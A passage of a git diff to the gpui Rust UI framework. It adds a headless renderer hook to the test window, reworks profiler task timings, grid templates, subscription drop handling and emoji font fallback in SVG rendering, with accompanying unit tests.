hit_test_window_control_callback: Option Option>>, input_callback: Option DispatchEventResult>>, @@ -57,13 +60,19 @@ impl TestWindow { params: WindowParams, platform: Weak, display: Rc, + renderer: Option>, ) -> Self { + let sprite_atlas: Arc = match &renderer { + Some(r) => r.sprite_atlas(), + None => Arc::new(TestAtlas::new()), + }; Self(Rc::new(Mutex::new(TestWindowState { bounds: params.bounds, display, platform, handle, - sprite_atlas: Arc::new(TestAtlas::new()), + sprite_atlas, + renderer, title: Default::default(), edited: false, should_close_handler: None, @@ -81,10 +90,11 @@ impl TestWindow { pub fn simulate_resize(&mut self, size: Size) { let scale_factor = self.scale_factor(); let mut lock = self.0.lock(); + // Always update bounds, even if no callback is registered + lock.bounds.size = size; let Some(mut callback) = lock.resize_callback.take() else { return; }; - lock.bounds.size = size; drop(lock); callback(size, scale_factor); self.0.lock().resize_callback = Some(callback); @@ -275,12 +285,25 @@ impl PlatformWindow for TestWindow { fn on_appearance_changed(&self, _callback: Box) {} - fn draw(&self, _scene: &crate::Scene) {} + fn draw(&self, _scene: &Scene) {} fn sprite_atlas(&self) -> sync::Arc { self.0.lock().sprite_atlas.clone() } + #[cfg(any(test, feature = "test-support"))] + fn render_to_image(&self, scene: &Scene) -> anyhow::Result { + let mut state = self.0.lock(); + let size = state.bounds.size; + if let Some(renderer) = &mut state.renderer { + let scale_factor = 2.0; + let device_size: Size = size.to_device_pixels(scale_factor); + renderer.render_scene_to_image(scene, device_size) + } else { + anyhow::bail!("render_to_image not available: no HeadlessRenderer configured") + } + } + fn as_test(&mut self) -> Option<&mut TestWindow> { Some(self) } diff --git a/crates/gpui/src/platform_scheduler.rs b/crates/gpui/src/platform_scheduler.rs index 900cd6041d38380f4d9cb3ff9b87a3605b0ebd78..0087c588d8d6381fa1fe590a2366c2e35ffe0a7a 100644 --- 
a/crates/gpui/src/platform_scheduler.rs +++ b/crates/gpui/src/platform_scheduler.rs @@ -109,16 +109,13 @@ impl Scheduler for PlatformScheduler { #[track_caller] fn timer(&self, duration: Duration) -> Timer { - use std::sync::{Arc, atomic::AtomicBool}; - let (tx, rx) = oneshot::channel(); let dispatcher = self.dispatcher.clone(); // Create a runnable that will send the completion signal let location = std::panic::Location::caller(); - let closed = Arc::new(AtomicBool::new(false)); let (runnable, _task) = async_task::Builder::new() - .metadata(RunnableMeta { location, closed }) + .metadata(RunnableMeta { location }) .spawn( move |_| async move { let _ = tx.send(()); diff --git a/crates/gpui/src/profiler.rs b/crates/gpui/src/profiler.rs index ccbc86e3fe35a095b2de9de159286250a24d7a05..1405b4d04964f5497bb4d7f865d6c4405507b43d 100644 --- a/crates/gpui/src/profiler.rs +++ b/crates/gpui/src/profiler.rs @@ -1,9 +1,8 @@ use scheduler::Instant; use std::{ cell::LazyCell, - collections::HashMap, - hash::Hasher, - hash::{DefaultHasher, Hash}, + collections::{HashMap, VecDeque}, + hash::{DefaultHasher, Hash, Hasher}, sync::Arc, thread::ThreadId, }; @@ -45,7 +44,6 @@ impl ThreadTaskTimings { let timings = &timings.timings; let mut vec = Vec::with_capacity(timings.len()); - let (s1, s2) = timings.as_slices(); vec.extend_from_slice(s1); vec.extend_from_slice(s2); @@ -169,7 +167,7 @@ pub struct ThreadTimingsDelta { #[doc(hidden)] pub struct ProfilingCollector { startup_time: Instant, - cursors: HashMap, + cursors: HashMap, } impl ProfilingCollector { @@ -195,7 +193,7 @@ impl ProfilingCollector { thread.thread_id.hash(&mut hasher); let hashed_id = hasher.finish(); - let prev_cursor = self.cursors.get(&hashed_id).copied().unwrap_or(0); + let prev_cursor = self.cursors.get(&thread.thread_id).copied().unwrap_or(0); let buffer_len = thread.timings.len() as u64; let buffer_start = thread.total_pushed.saturating_sub(buffer_len); @@ -205,7 +203,7 @@ impl ProfilingCollector { 
thread.timings.as_slice() } else { let skip = (prev_cursor - buffer_start) as usize; - &thread.timings[skip..] + &thread.timings[skip.min(thread.timings.len())..] }; // Don't emit the last entry if it's still in-progress (end: None). @@ -215,12 +213,12 @@ impl ProfilingCollector { } let cursor_advance = if incomplete_at_end { - thread.total_pushed - 1 + thread.total_pushed.saturating_sub(1) } else { thread.total_pushed }; - self.cursors.insert(hashed_id, cursor_advance); + self.cursors.insert(thread.thread_id, cursor_advance); if slice.is_empty() { continue; @@ -243,11 +241,14 @@ impl ProfilingCollector { } } -// Allow 20mb of task timing entries -const MAX_TASK_TIMINGS: usize = (20 * 1024 * 1024) / core::mem::size_of::(); +// Allow 16MiB of task timing entries. +// VecDeque grows by doubling its capacity when full, so keep this a power of 2 to avoid wasting +// memory. +const MAX_TASK_TIMINGS: usize = (16 * 1024 * 1024) / core::mem::size_of::(); #[doc(hidden)] -pub type TaskTimings = circular_buffer::CircularBuffer; +pub(crate) type TaskTimings = VecDeque; + #[doc(hidden)] pub type GuardedTaskTimings = spin::Mutex; @@ -287,7 +288,7 @@ thread_local! { pub struct ThreadTimings { pub thread_name: Option, pub thread_id: ThreadId, - pub timings: Box, + pub timings: TaskTimings, pub total_pushed: u64, } @@ -296,10 +297,38 @@ impl ThreadTimings { ThreadTimings { thread_name, thread_id, - timings: TaskTimings::boxed(), + timings: TaskTimings::new(), total_pushed: 0, } } + + /// If this task is the same as the last task, update the end time of the last task. + /// + /// Otherwise, add the new task timing to the list. 
+ pub fn add_task_timing(&mut self, timing: TaskTiming) { + if let Some(last_timing) = self.timings.back_mut() + && last_timing.location == timing.location + && last_timing.start == timing.start + { + last_timing.end = timing.end; + } else { + while self.timings.len() + 1 > MAX_TASK_TIMINGS { + // This should only ever pop one element because it matches the insertion below. + self.timings.pop_front(); + } + self.timings.push_back(timing); + self.total_pushed += 1; + } + } + + pub fn get_thread_task_timings(&self) -> ThreadTaskTimings { + ThreadTaskTimings { + thread_name: self.thread_name.clone(), + thread_id: self.thread_id, + timings: self.timings.iter().cloned().collect(), + total_pushed: self.total_pushed, + } + } } impl Drop for ThreadTimings { @@ -318,19 +347,13 @@ impl Drop for ThreadTimings { } #[doc(hidden)] -#[allow(dead_code)] // Used by Linux and Windows dispatchers, not macOS pub fn add_task_timing(timing: TaskTiming) { THREAD_TIMINGS.with(|timings| { - let mut timings = timings.lock(); - - if let Some(last_timing) = timings.timings.back_mut() { - if last_timing.location == timing.location && last_timing.start == timing.start { - last_timing.end = timing.end; - return; - } - } - - timings.timings.push_back(timing); - timings.total_pushed += 1; + timings.lock().add_task_timing(timing); }); } + +#[doc(hidden)] +pub fn get_current_thread_task_timings() -> ThreadTaskTimings { + THREAD_TIMINGS.with(|timings| timings.lock().get_thread_task_timings()) +} diff --git a/crates/gpui/src/scene.rs b/crates/gpui/src/scene.rs index 7e0ffe017024cc7914885df9ea713a3ec3db820e..22b1bb468d84b2897b312c6fc8af00ee5c8523db 100644 --- a/crates/gpui/src/scene.rs +++ b/crates/gpui/src/scene.rs @@ -657,7 +657,7 @@ impl Default for TransformationMatrix { #[expect(missing_docs)] pub struct MonochromeSprite { pub order: DrawOrder, - pub pad: u32, // align to 8 bytes + pub pad: u32, pub bounds: Bounds, pub content_mask: ContentMask, pub color: Hsla, @@ -695,7 +695,7 @@ impl From for 
Primitive { #[expect(missing_docs)] pub struct PolychromeSprite { pub order: DrawOrder, - pub pad: u32, // align to 8 bytes + pub pad: u32, pub grayscale: bool, pub opacity: f32, pub bounds: Bounds, diff --git a/crates/gpui/src/style.rs b/crates/gpui/src/style.rs index dda49d990ac525f8b9f14b8a61a9c55c43e58e3b..97acc6f92bc2b3ba08a087486f21e193cb94e64d 100644 --- a/crates/gpui/src/style.rs +++ b/crates/gpui/src/style.rs @@ -138,6 +138,42 @@ impl ObjectFit { } } +/// The minimum size of a column or row in a grid layout +#[derive( + Copy, Clone, PartialEq, Eq, PartialOrd, Ord, Debug, Default, JsonSchema, Serialize, Deserialize, +)] +pub enum TemplateColumnMinSize { + /// The column size may be 0 + #[default] + Zero, + /// The column size can be determined by the min content + MinContent, + /// The column size can be determined by the max content + MaxContent, +} + +/// A simplified representation of the grid-template-* value +#[derive( + Copy, + Clone, + Refineable, + PartialEq, + Eq, + PartialOrd, + Ord, + Debug, + Default, + JsonSchema, + Serialize, + Deserialize, +)] +pub struct GridTemplate { + /// How this template directive should be repeated + pub repeat: u16, + /// The minimum size in the repeat(<>, minmax(_, 1fr)) equation + pub min_size: TemplateColumnMinSize, +} + /// The CSS styling that can be applied to an element via the `Styled` trait #[derive(Clone, Refineable, Debug)] #[refineable(Debug, PartialEq, Serialize, Deserialize, JsonSchema)] @@ -262,16 +298,12 @@ pub struct Style { pub opacity: Option, /// The grid columns of this element - /// Equivalent to the Tailwind `grid-cols-` - pub grid_cols: Option, - - /// The grid columns with min-content minimum sizing. - /// Unlike grid_cols, it won't shrink to width 0 in AvailableSpace::MinContent constraints. 
- pub grid_cols_min_content: Option, + /// Roughly equivalent to the Tailwind `grid-cols-` + pub grid_cols: Option, /// The row span of this element /// Equivalent to the Tailwind `grid-rows-` - pub grid_rows: Option, + pub grid_rows: Option, /// The grid location of this element pub grid_location: Option, @@ -790,7 +822,6 @@ impl Default for Style { opacity: None, grid_rows: None, grid_cols: None, - grid_cols_min_content: None, grid_location: None, #[cfg(debug_assertions)] diff --git a/crates/gpui/src/styled.rs b/crates/gpui/src/styled.rs index 3d0b86a9523f5ac05e51941c826e32379368c464..687e71a94ce4d19a1795baed3381e0452c376a89 100644 --- a/crates/gpui/src/styled.rs +++ b/crates/gpui/src/styled.rs @@ -1,9 +1,9 @@ use crate::{ - self as gpui, AbsoluteLength, AlignContent, AlignItems, BorderStyle, CursorStyle, + self as gpui, AbsoluteLength, AlignContent, AlignItems, AlignSelf, BorderStyle, CursorStyle, DefiniteLength, Display, Fill, FlexDirection, FlexWrap, Font, FontFeatures, FontStyle, - FontWeight, GridPlacement, Hsla, JustifyContent, Length, SharedString, StrikethroughStyle, - StyleRefinement, TextAlign, TextOverflow, TextStyleRefinement, UnderlineStyle, WhiteSpace, px, - relative, rems, + FontWeight, GridPlacement, GridTemplate, Hsla, JustifyContent, Length, SharedString, + StrikethroughStyle, StyleRefinement, TemplateColumnMinSize, TextAlign, TextOverflow, + TextStyleRefinement, UnderlineStyle, WhiteSpace, px, relative, rems, }; pub use gpui_macros::{ border_style_methods, box_shadow_style_methods, cursor_style_methods, margin_style_methods, @@ -278,6 +278,55 @@ pub trait Styled: Sized { self } + /// Sets how this specific element is aligned along the container's cross axis. + /// [Docs](https://tailwindcss.com/docs/align-self#start) + fn self_start(mut self) -> Self { + self.style().align_self = Some(AlignSelf::Start); + self + } + + /// Sets this element to align against the end of the container's cross axis. 
+ /// [Docs](https://tailwindcss.com/docs/align-self#end) + fn self_end(mut self) -> Self { + self.style().align_self = Some(AlignSelf::End); + self + } + + /// Sets this element to align against the start of the container's cross axis. + /// [Docs](https://tailwindcss.com/docs/align-self#start) + fn self_flex_start(mut self) -> Self { + self.style().align_self = Some(AlignSelf::FlexStart); + self + } + + /// Sets this element to align against the end of the container's cross axis. + /// [Docs](https://tailwindcss.com/docs/align-self#end) + fn self_flex_end(mut self) -> Self { + self.style().align_self = Some(AlignSelf::FlexEnd); + self + } + + /// Sets this element to align along the center of the container's cross axis. + /// [Docs](https://tailwindcss.com/docs/align-self#center) + fn self_center(mut self) -> Self { + self.style().align_self = Some(AlignSelf::Center); + self + } + + /// Sets this element to align along the baseline of the container's cross axis. + /// [Docs](https://tailwindcss.com/docs/align-self#baseline) + fn self_baseline(mut self) -> Self { + self.style().align_self = Some(AlignSelf::Baseline); + self + } + + /// Sets this element to stretch to fill the available space along the container's cross axis. + /// [Docs](https://tailwindcss.com/docs/align-self#stretch) + fn self_stretch(mut self) -> Self { + self.style().align_self = Some(AlignSelf::Stretch); + self + } + /// Sets the element to justify flex items against the start of the container's main axis. /// [Docs](https://tailwindcss.com/docs/justify-content#start) fn justify_start(mut self) -> Self { @@ -384,6 +433,20 @@ pub trait Styled: Sized { self } + /// Sets the aspect ratio of the element. + /// [Docs](https://tailwindcss.com/docs/aspect-ratio) + fn aspect_ratio(mut self, ratio: f32) -> Self { + self.style().aspect_ratio = Some(ratio); + self + } + + /// Sets the aspect ratio of the element to 1/1 – equal width and height. 
+ /// [Docs](https://tailwindcss.com/docs/aspect-ratio) + fn aspect_square(mut self) -> Self { + self.style().aspect_ratio = Some(1.0); + self + } + /// Sets the background color of the element. fn bg(mut self, fill: F) -> Self where @@ -648,20 +711,38 @@ pub trait Styled: Sized { /// Sets the grid columns of this element. fn grid_cols(mut self, cols: u16) -> Self { - self.style().grid_cols = Some(cols); + self.style().grid_cols = Some(GridTemplate { + repeat: cols, + min_size: TemplateColumnMinSize::Zero, + }); self } /// Sets the grid columns with min-content minimum sizing. /// Unlike grid_cols, it won't shrink to width 0 in AvailableSpace::MinContent constraints. fn grid_cols_min_content(mut self, cols: u16) -> Self { - self.style().grid_cols_min_content = Some(cols); + self.style().grid_cols = Some(GridTemplate { + repeat: cols, + min_size: TemplateColumnMinSize::MinContent, + }); + self + } + + /// Sets the grid columns with max-content maximum sizing for content-based column widths. + fn grid_cols_max_content(mut self, cols: u16) -> Self { + self.style().grid_cols = Some(GridTemplate { + repeat: cols, + min_size: TemplateColumnMinSize::MaxContent, + }); self } /// Sets the grid rows of this element. 
fn grid_rows(mut self, rows: u16) -> Self { - self.style().grid_rows = Some(rows); + self.style().grid_rows = Some(GridTemplate { + repeat: rows, + min_size: TemplateColumnMinSize::Zero, + }); self } diff --git a/crates/gpui/src/subscription.rs b/crates/gpui/src/subscription.rs index cf44b68d2bcbf7ca7d02c4b9e956f15079f8bdb6..b0c55a3966192ea0a15011e3cd2d14498c680c46 100644 --- a/crates/gpui/src/subscription.rs +++ b/crates/gpui/src/subscription.rs @@ -1,9 +1,8 @@ -use collections::{BTreeMap, BTreeSet}; +use collections::BTreeMap; use gpui_util::post_inc; use std::{ cell::{Cell, RefCell}, fmt::Debug, - mem, rc::Rc, }; @@ -19,12 +18,12 @@ impl Clone for SubscriberSet { struct SubscriberSetState { subscribers: BTreeMap>>>, - dropped_subscribers: BTreeSet<(EmitterKey, usize)>, next_subscriber_id: usize, } struct Subscriber { active: Rc>, + dropped: Rc>, callback: Callback, } @@ -36,7 +35,6 @@ where pub fn new() -> Self { Self(Rc::new(RefCell::new(SubscriberSetState { subscribers: Default::default(), - dropped_subscribers: Default::default(), next_subscriber_id: 0, }))) } @@ -51,6 +49,7 @@ where callback: Callback, ) -> (Subscription, impl FnOnce() + use) { let active = Rc::new(Cell::new(false)); + let dropped = Rc::new(Cell::new(false)); let mut lock = self.0.borrow_mut(); let subscriber_id = post_inc(&mut lock.next_subscriber_id); lock.subscribers @@ -61,6 +60,7 @@ where subscriber_id, Subscriber { active: active.clone(), + dropped: dropped.clone(), callback, }, ); @@ -68,9 +68,10 @@ where let subscription = Subscription { unsubscribe: Some(Box::new(move || { + dropped.set(true); + let mut lock = this.borrow_mut(); let Some(subscribers) = lock.subscribers.get_mut(&emitter_key) else { - // remove was called with this emitter_key return; }; @@ -79,14 +80,7 @@ where if subscribers.is_empty() { lock.subscribers.remove(&emitter_key); } - return; } - - // We didn't manage to remove the subscription, which means it was dropped - // while invoking the callback. 
Mark it as dropped so that we can remove it - // later. - lock.dropped_subscribers - .insert((emitter_key, subscriber_id)); })), }; (subscription, move || active.set(true)) @@ -128,11 +122,14 @@ where }; subscribers.retain(|_, subscriber| { - if subscriber.active.get() { - f(&mut subscriber.callback) - } else { - true + if !subscriber.active.get() { + return true; } + if subscriber.dropped.get() { + return false; + } + let keep = f(&mut subscriber.callback); + keep && !subscriber.dropped.get() }); let mut lock = self.0.borrow_mut(); @@ -141,12 +138,6 @@ where subscribers.extend(new_subscribers); } - // Remove any dropped subscriptions that were dropped while invoking the callback. - for (dropped_emitter, dropped_subscription_id) in mem::take(&mut lock.dropped_subscribers) { - debug_assert_eq!(*emitter, dropped_emitter); - subscribers.remove(&dropped_subscription_id); - } - if !subscribers.is_empty() { lock.subscribers.insert(emitter.clone(), Some(subscribers)); } @@ -207,3 +198,154 @@ impl std::fmt::Debug for Subscription { f.debug_struct("Subscription").finish() } } + +#[cfg(test)] +mod tests { + use super::*; + use crate::{Global, TestApp}; + + #[test] + fn test_unsubscribe_during_callback_with_insert() { + struct TestGlobal; + impl Global for TestGlobal {} + + let mut app = TestApp::new(); + app.set_global(TestGlobal); + + let observer_a_count = Rc::new(Cell::new(0usize)); + let observer_b_count = Rc::new(Cell::new(0usize)); + + let sub_a: Rc>> = Default::default(); + let sub_b: Rc>> = Default::default(); + + // Observer A fires first (lower subscriber_id). It drops itself and + // inserts a new observer for the same global. + *sub_a.borrow_mut() = Some(app.update({ + let count = observer_a_count.clone(); + let sub_a = sub_a.clone(); + move |cx| { + cx.observe_global::(move |cx| { + count.set(count.get() + 1); + sub_a.borrow_mut().take(); + cx.observe_global::(|_| {}).detach(); + }) + } + })); + + // Observer B fires second. It just drops itself. 
+ *sub_b.borrow_mut() = Some(app.update({ + let count = observer_b_count.clone(); + let sub_b = sub_b.clone(); + move |cx| { + cx.observe_global::(move |_cx| { + count.set(count.get() + 1); + sub_b.borrow_mut().take(); + }) + } + })); + + // Both fire once. + app.update(|cx| cx.set_global(TestGlobal)); + assert_eq!(observer_a_count.get(), 1); + assert_eq!(observer_b_count.get(), 1); + + // Neither should fire again — both dropped their subscriptions. + app.update(|cx| cx.set_global(TestGlobal)); + assert_eq!(observer_a_count.get(), 1); + assert_eq!(observer_b_count.get(), 1, "orphaned subscriber fired again"); + } + + #[test] + fn test_callback_dropped_by_earlier_callback_does_not_fire() { + struct TestGlobal; + impl Global for TestGlobal {} + + let mut app = TestApp::new(); + app.set_global(TestGlobal); + + let observer_b_count = Rc::new(Cell::new(0usize)); + let sub_b: Rc>> = Default::default(); + + // Observer A fires first and drops B's subscription. + app.update({ + let sub_b = sub_b.clone(); + move |cx| { + cx.observe_global::(move |_cx| { + sub_b.borrow_mut().take(); + }) + .detach(); + } + }); + + // Observer B fires second — but A already dropped it. 
+ *sub_b.borrow_mut() = Some(app.update({ + let count = observer_b_count.clone(); + move |cx| { + cx.observe_global::(move |_cx| { + count.set(count.get() + 1); + }) + } + })); + + app.update(|cx| cx.set_global(TestGlobal)); + assert_eq!( + observer_b_count.get(), + 0, + "B should not fire — A dropped its subscription" + ); + } + + #[test] + fn test_self_drop_during_callback() { + struct TestGlobal; + impl Global for TestGlobal {} + + let mut app = TestApp::new(); + app.set_global(TestGlobal); + + let count = Rc::new(Cell::new(0usize)); + let sub: Rc>> = Default::default(); + + *sub.borrow_mut() = Some(app.update({ + let count = count.clone(); + let sub = sub.clone(); + move |cx| { + cx.observe_global::(move |_cx| { + count.set(count.get() + 1); + sub.borrow_mut().take(); + }) + } + })); + + app.update(|cx| cx.set_global(TestGlobal)); + assert_eq!(count.get(), 1); + + app.update(|cx| cx.set_global(TestGlobal)); + assert_eq!(count.get(), 1, "should not fire after self-drop"); + } + + #[test] + fn test_subscription_drop() { + struct TestGlobal; + impl Global for TestGlobal {} + + let mut app = TestApp::new(); + app.set_global(TestGlobal); + + let count = Rc::new(Cell::new(0usize)); + + let subscription = app.update({ + let count = count.clone(); + move |cx| { + cx.observe_global::(move |_cx| { + count.set(count.get() + 1); + }) + } + }); + + drop(subscription); + + app.update(|cx| cx.set_global(TestGlobal)); + assert_eq!(count.get(), 0, "should not fire after drop"); + } +} diff --git a/crates/gpui/src/svg_renderer.rs b/crates/gpui/src/svg_renderer.rs index f82530f8d10fab074dd5e116114cf028a8a19cfe..8653ab9b162031772ab29367b60ff988e33cd823 100644 --- a/crates/gpui/src/svg_renderer.rs +++ b/crates/gpui/src/svg_renderer.rs @@ -10,6 +10,73 @@ use std::{ sync::{Arc, LazyLock}, }; +#[cfg(target_os = "macos")] +const EMOJI_FONT_FAMILIES: &[&str] = &["Apple Color Emoji", ".AppleColorEmojiUI"]; + +#[cfg(target_os = "windows")] +const EMOJI_FONT_FAMILIES: &[&str] = &["Segoe UI 
Emoji", "Segoe UI Symbol"]; + +#[cfg(any(target_os = "linux", target_os = "freebsd"))] +const EMOJI_FONT_FAMILIES: &[&str] = &[ + "Noto Color Emoji", + "Emoji One", + "Twitter Color Emoji", + "JoyPixels", +]; + +#[cfg(not(any( + target_os = "macos", + target_os = "windows", + target_os = "linux", + target_os = "freebsd", +)))] +const EMOJI_FONT_FAMILIES: &[&str] = &[]; + +fn is_emoji_presentation(c: char) -> bool { + static EMOJI_PRESENTATION_REGEX: LazyLock = + LazyLock::new(|| regex::Regex::new("\\p{Emoji_Presentation}").unwrap()); + let mut buf = [0u8; 4]; + EMOJI_PRESENTATION_REGEX.is_match(c.encode_utf8(&mut buf)) +} + +fn font_has_char(db: &usvg::fontdb::Database, id: usvg::fontdb::ID, ch: char) -> bool { + db.with_face_data(id, |font_data, face_index| { + ttf_parser::Face::parse(font_data, face_index) + .ok() + .and_then(|face| face.glyph_index(ch)) + .is_some() + }) + .unwrap_or(false) +} + +fn select_emoji_font( + ch: char, + fonts: &[usvg::fontdb::ID], + db: &usvg::fontdb::Database, + families: &[&str], +) -> Option { + for family_name in families { + let query = usvg::fontdb::Query { + families: &[usvg::fontdb::Family::Name(family_name)], + weight: usvg::fontdb::Weight(400), + stretch: usvg::fontdb::Stretch::Normal, + style: usvg::fontdb::Style::Normal, + }; + + let Some(id) = db.query(&query) else { + continue; + }; + + if fonts.contains(&id) || !font_has_char(db, id, ch) { + continue; + } + + return Some(id); + } + + None +} + /// When rendering SVGs, we render them at twice the size to get a higher-quality result. 
pub const SMOOTH_SVG_SCALE_FACTOR: f32 = 2.; @@ -52,10 +119,23 @@ impl SvgRenderer { default_font_resolver(font, db) }, ); + let default_fallback_selection = usvg::FontResolver::default_fallback_selector(); + let fallback_selection = Box::new( + move |ch: char, fonts: &[usvg::fontdb::ID], db: &mut Arc| { + if is_emoji_presentation(ch) { + if let Some(id) = select_emoji_font(ch, fonts, db.as_ref(), EMOJI_FONT_FAMILIES) + { + return Some(id); + } + } + + default_fallback_selection(ch, fonts, db) + }, + ); let options = usvg::Options { font_resolver: usvg::FontResolver { select_font: font_resolver, - select_fallback: usvg::FontResolver::default_fallback_selector(), + select_fallback: fallback_selection, }, ..Default::default() }; @@ -70,7 +150,6 @@ impl SvgRenderer { &self, bytes: &[u8], scale_factor: f32, - to_brga: bool, ) -> Result, usvg::Error> { self.render_pixmap( bytes, @@ -81,10 +160,8 @@ impl SvgRenderer { image::ImageBuffer::from_raw(pixmap.width(), pixmap.height(), pixmap.take()) .unwrap(); - if to_brga { - for pixel in buffer.chunks_exact_mut(4) { - swap_rgba_pa_to_bgra(pixel); - } + for pixel in buffer.chunks_exact_mut(4) { + swap_rgba_pa_to_bgra(pixel); } let mut image = RenderImage::new(SmallVec::from_const([Frame::new(buffer)])); @@ -148,3 +225,73 @@ impl SvgRenderer { Ok(pixmap) } } + +#[cfg(test)] +mod tests { + use super::*; + + const IBM_PLEX_REGULAR: &[u8] = + include_bytes!("../../../assets/fonts/ibm-plex-sans/IBMPlexSans-Regular.ttf"); + const LILEX_REGULAR: &[u8] = include_bytes!("../../../assets/fonts/lilex/Lilex-Regular.ttf"); + + #[test] + fn test_is_emoji_presentation() { + let cases = [ + ("a", false), + ("Z", false), + ("1", false), + ("#", false), + ("*", false), + ("漢", false), + ("中", false), + ("カ", false), + ("©", false), + ("♥", false), + ("😀", true), + ("✅", true), + ("🇺🇸", true), + // SVG fallback is not cluster-aware yet + ("©️", false), + ("♥️", false), + ("1️⃣", false), + ]; + for (s, expected) in cases { + assert_eq!( + 
is_emoji_presentation(s.chars().next().unwrap()), + expected, + "for char {:?}", + s + ); + } + } + + #[test] + fn test_select_emoji_font_skips_family_without_glyph() { + let mut db = usvg::fontdb::Database::new(); + + db.load_font_data(IBM_PLEX_REGULAR.to_vec()); + db.load_font_data(LILEX_REGULAR.to_vec()); + + let ibm_plex_sans = db + .query(&usvg::fontdb::Query { + families: &[usvg::fontdb::Family::Name("IBM Plex Sans")], + weight: usvg::fontdb::Weight(400), + stretch: usvg::fontdb::Stretch::Normal, + style: usvg::fontdb::Style::Normal, + }) + .unwrap(); + let lilex = db + .query(&usvg::fontdb::Query { + families: &[usvg::fontdb::Family::Name("Lilex")], + weight: usvg::fontdb::Weight(400), + stretch: usvg::fontdb::Stretch::Normal, + style: usvg::fontdb::Style::Normal, + }) + .unwrap(); + let selected = select_emoji_font('│', &[], &db, &["IBM Plex Sans", "Lilex"]).unwrap(); + + assert_eq!(selected, lilex); + assert!(!font_has_char(&db, ibm_plex_sans, '│')); + assert!(font_has_char(&db, selected, '│')); + } +} diff --git a/crates/gpui/src/taffy.rs b/crates/gpui/src/taffy.rs index 99a50b87c8aa9f40a7694f1c2084b10f6d0a9315..094b65553d9abac1c0b32fc44333fddde12ed64c 100644 --- a/crates/gpui/src/taffy.rs +++ b/crates/gpui/src/taffy.rs @@ -1,6 +1,6 @@ use crate::{ - AbsoluteLength, App, Bounds, DefiniteLength, Edges, Length, Pixels, Point, Size, Style, Window, - point, size, + AbsoluteLength, App, Bounds, DefiniteLength, Edges, GridTemplate, Length, Pixels, Point, Size, + Style, Window, point, size, }; use collections::{FxHashMap, FxHashSet}; use stacksafe::{StackSafe, stacksafe}; @@ -8,7 +8,7 @@ use std::{fmt::Debug, ops::Range}; use taffy::{ TaffyTree, TraversePartialTree as _, geometry::{Point as TaffyPoint, Rect as TaffyRect, Size as TaffySize}, - prelude::min_content, + prelude::{max_content, min_content}, style::AvailableSpace as TaffyAvailableSpace, tree::NodeId, }; @@ -308,19 +308,31 @@ impl ToTaffy for Style { } fn to_grid_repeat( - unit: &Option, + unit: 
&Option, ) -> Vec> { - // grid-template-columns: repeat(, minmax(0, 1fr)); - unit.map(|count| vec![repeat(count, vec![minmax(length(0.0), fr(1.0))])]) - .unwrap_or_default() - } - - fn to_grid_repeat_min_content( - unit: &Option, - ) -> Vec> { - // grid-template-columns: repeat(, minmax(min-content, 1fr)); - unit.map(|count| vec![repeat(count, vec![minmax(min_content(), fr(1.0))])]) - .unwrap_or_default() + unit.map(|template| { + match template.min_size { + // grid-template-*: repeat(, minmax(0, 1fr)); + crate::TemplateColumnMinSize::Zero => { + vec![repeat(template.repeat, vec![minmax(length(0.0), fr(1.0))])] + } + // grid-template-*: repeat(, minmax(min-content, 1fr)); + crate::TemplateColumnMinSize::MinContent => { + vec![repeat( + template.repeat, + vec![minmax(min_content(), fr(1.0))], + )] + } + // grid-template-*: repeat(, minmax(0, max-content)) + crate::TemplateColumnMinSize::MaxContent => { + vec![repeat( + template.repeat, + vec![minmax(length(0.0), max_content())], + )] + } + } + }) + .unwrap_or_default() } taffy::style::Style { @@ -347,11 +359,7 @@ impl ToTaffy for Style { flex_grow: self.flex_grow, flex_shrink: self.flex_shrink, grid_template_rows: to_grid_repeat(&self.grid_rows), - grid_template_columns: if self.grid_cols_min_content.is_some() { - to_grid_repeat_min_content(&self.grid_cols_min_content) - } else { - to_grid_repeat(&self.grid_cols) - }, + grid_template_columns: to_grid_repeat(&self.grid_cols), grid_row: self .grid_location .as_ref() diff --git a/crates/gpui/src/test.rs b/crates/gpui/src/test.rs index 9e76d97e97e941121417d872e8c6f596cf658e20..ddcc3d27bd04d2fd82b3367a2fee6930e86ef356 100644 --- a/crates/gpui/src/test.rs +++ b/crates/gpui/src/test.rs @@ -27,12 +27,43 @@ //! 
``` use crate::{Entity, Subscription, TestAppContext, TestDispatcher}; use futures::StreamExt as _; +use proptest::prelude::{Just, Strategy, any}; use std::{ env, - panic::{self, RefUnwindSafe}, + panic::{self, RefUnwindSafe, UnwindSafe}, pin::Pin, }; +/// Strategy injected into `#[gpui::property_test]` tests to control the seed +/// given to the scheduler. Doesn't shrink, since all scheduler seeds are +/// equivalent in complexity. If `$SEED` is set, it always uses that value. +pub fn seed_strategy() -> impl Strategy { + match std::env::var("SEED") { + Ok(val) => Just(val.parse().unwrap()).boxed(), + Err(_) => any::().no_shrink().boxed(), + } +} + +/// Similar to [`run_test`], but only runs the callback once, allowing +/// [`FnOnce`] callbacks. This is intended for use with the +/// `gpui::property_test` macro and generally should not be used directly. +/// +/// Doesn't support many features of [`run_test`], since these are provided by +/// proptest. +pub fn run_test_once(seed: u64, test_fn: Box) { + let result = panic::catch_unwind(|| { + let dispatcher = TestDispatcher::new(seed); + let scheduler = dispatcher.scheduler().clone(); + test_fn(dispatcher); + scheduler.end_test(); + }); + + match result { + Ok(()) => {} + Err(e) => panic::resume_unwind(e), + } +} + /// Run the given test function with the configured parameters. /// This is intended for use with the `gpui::test` macro /// and generally should not be used directly. diff --git a/crates/gpui/src/text_system.rs b/crates/gpui/src/text_system.rs index 43982b2666bde8210f770419623cc0b9afd6e2af..b62a0ad6fd4f885b127144bd66e8e3e41747d889 100644 --- a/crates/gpui/src/text_system.rs +++ b/crates/gpui/src/text_system.rs @@ -63,7 +63,8 @@ pub struct TextSystem { } impl TextSystem { - pub(crate) fn new(platform_text_system: Arc) -> Self { + /// Create a new TextSystem with the given platform text system. 
